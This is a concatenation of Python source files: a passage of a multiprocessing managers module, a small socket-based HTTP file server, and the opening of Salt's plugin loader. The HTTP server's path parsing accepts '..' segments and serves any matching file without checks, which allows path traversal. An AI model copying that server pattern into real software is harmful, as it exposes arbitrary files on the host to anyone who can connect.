typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = { #XXX: register dill?
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
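# Illustrative usage sketch (not part of this module): registering a plain
# class with a BaseManager subclass and calling it through the generated
# proxy.  The names Maths/MathsManager are hypothetical; the import assumes
# the stdlib entry point and may differ if this file ships in a fork.
#
#     from multiprocessing.managers import BaseManager
#
#     class Maths:
#         def add(self, x, y):
#             return x + y
#
#     class MathsManager(BaseManager):
#         pass
#
#     MathsManager.register('Maths', Maths)
#
#     if __name__ == '__main__':
#         with MathsManager() as m:      # __enter__ calls start()
#             proxy = m.Maths()          # AutoProxy for the server-side object
#             print(proxy.add(2, 3))     # runs in the manager's server process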
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = getattr(time,'monotonic',time.time)() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - getattr(time,'monotonic',time.time)()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
__class_getitem__ = classmethod(types.GenericAlias)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocess.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
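# Illustrative usage sketch (not part of this module): the registrations above
# are what the stock Manager() helper exposes, assuming the stdlib entry point.
#
#     from multiprocessing import Manager, Process
#
#     def worker(d, lst):
#         d['done'] = True     # DictProxy forwards __setitem__ to the server
#         lst.append(1)        # ListProxy forwards append
#
#     if __name__ == '__main__':
#         with Manager() as m:
#             d, lst = m.dict(), m.list()
#             p = Process(target=worker, args=(d, lst))
#             p.start(); p.join()
#             print(dict(d), list(lst))   # {'done': True} [1]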
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(self, c, typeid, /, *args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(self, c, typeid, *args, **kwargs)
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
pass
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
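# --- Illustrative usage sketch (not part of this module) ---
# A minimal example of how SharedMemoryManager might be used from client code;
# the snippet below is only a sketch for illustration. Every SharedMemory and
# ShareableList handed out is tracked by the manager's SharedMemoryServer and
# unlinked when the manager shuts down.
#
#     from multiprocessing.managers import SharedMemoryManager
#
#     with SharedMemoryManager() as smm:
#         block = smm.SharedMemory(size=128)       # tracked by the manager
#         block.buf[:5] = b"hello"                 # write into the shared block
#         numbers = smm.ShareableList([1, 2, 3])   # list backed by shared memory
#         numbers[0] = 42
#     # on exit, the server calls unlink() on both tracked segments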
|
httpserver.py
|
import socket
import threading
import re
import os
HOST = 'localhost'
PORT = 3333
BUFSIZE = 4096
# HTTP header building blocks
LINE = '\n'
HTTP_200_STATUS = 'HTTP/1.0 200 OK\n'
HTTP_404_STATUS = 'HTTP/1.0 404 Not Found\n'
SERVER_NAME = 'Server: Python Http Server\n'
CONTENT_TYPE = 'Content-Type: text/html; charset=UTF-8\n'
def http_listen(client, path):
    # The response starts with the status line, followed by the headers,
    # a blank line, and then the body.
    if os.path.isfile(path):
        with open(path) as body:
            msg = HTTP_200_STATUS + SERVER_NAME + CONTENT_TYPE + LINE + body.read()
    else:
        msg = HTTP_404_STATUS + SERVER_NAME + CONTENT_TYPE + LINE
    client.sendall(msg.encode('utf-8'))
    client.close()
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create the listening socket
server.bind((HOST, PORT))  # bind the socket to the host and port
server.listen()  # start listening for connections
while True:
    print("Receiving a request")
    client, addr = server.accept()  # wait for an incoming connection
    print("Connecting from: " + addr[0])
    data = client.recv(BUFSIZE)
    path = re.search(rb'/[\w\./%]*', data)  # try to extract the path from the HTTP request line
    path = "." + path.group().decode('utf-8')
    thread = threading.Thread(target=http_listen, args=(client, path))  # handle the request in a new thread
    thread.start()  # run it
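# --- Illustrative client sketch (not part of the server above) ---
# A minimal, hedged way to exercise the server from another process, assuming
# it is already running and that a file such as ./index.html exists in its
# working directory (both are assumptions, not guaranteed by this file):
#
#     import urllib.request
#
#     with urllib.request.urlopen("http://localhost:3333/index.html") as resp:
#         print(resp.status)          # 200 when ./index.html exists
#         print(resp.read()[:80])     # first bytes of the served file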
|
loader.py
|
"""
The Salt loader is the core of Salt's plugin system. The loader scans
directories for Python loadable code and organizes that code into the
plugin interfaces used by Salt.
"""
import contextvars
import copy
import functools
import importlib.machinery # pylint: disable=no-name-in-module,import-error
import importlib.util # pylint: disable=no-name-in-module,import-error
import inspect
import logging
import os
import re
import sys
import tempfile
import threading
import time
import traceback
import types
from collections.abc import MutableMapping
from zipimport import zipimporter
import salt.config
import salt.defaults.events
import salt.defaults.exitcodes
import salt.loader_context
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.lazy
import salt.utils.odict
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from salt.exceptions import LoaderError
from salt.ext import six
from salt.ext.six.moves import reload_module
from salt.template import check_render_pipe_str
from salt.utils.decorators import Depends
try:
import pkg_resources
HAS_PKG_RESOURCES = True
except ImportError:
HAS_PKG_RESOURCES = False
log = logging.getLogger(__name__)
SALT_BASE_PATH = os.path.abspath(salt.syspaths.INSTALL_DIR)
LOADED_BASE_NAME = "salt.loaded"
# pylint: disable=no-member
MODULE_KIND_SOURCE = 1
MODULE_KIND_COMPILED = 2
MODULE_KIND_EXTENSION = 3
MODULE_KIND_PKG_DIRECTORY = 5
SUFFIXES = []
